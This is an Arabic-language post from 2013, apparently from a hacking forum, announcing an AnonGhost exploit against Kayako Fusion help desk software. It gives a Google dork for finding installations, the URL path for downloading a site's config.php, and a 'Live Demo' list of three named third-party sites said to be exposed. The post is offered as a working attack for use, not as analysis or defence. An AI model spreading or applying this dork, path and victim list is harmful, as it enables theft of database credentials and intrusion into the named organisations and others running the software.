لاصحاب المواقع ثغرة جديدة لسحب __config.php من المواقع بتاريخ 8/10/2013

قام الفريق المعروف ب AnonGhost بكتشاف ثغرة تمكنك من سحب كونفيقات المواقع
وذلك بتاريخ 08/10/2013

#######################################################

# Exploit Title: Remote File Upload Kayako Script

#

# Google Dork: Powered by Kayako Fusion Help Desk Software

#

# Date: 08.10.2013

#

# Exploit Author: Mauritania Attacker & Virusa Worm

#

# Vendor Homepage: http://www.kayako.com/

#

# Software Link: http://www.kayako.com/products/fusion/

#

# Tested Version: 4.57.1.3626

#

# Tested on: Windows

#

# Description : Configuration Can be Downloaded

#

# Thanks to : All AnonGhost members

#######################################################

 

#Exploit Vulnerable : www.sites.com/__swift/config/config.php

 

# Live Demo :

# http://help.macmillan.com/__swift/config/config.php

# http://affiliatefuture.helpserve.com/__swift/config/config.php

# http://ctl.helpserve.com/__swift/config/config.php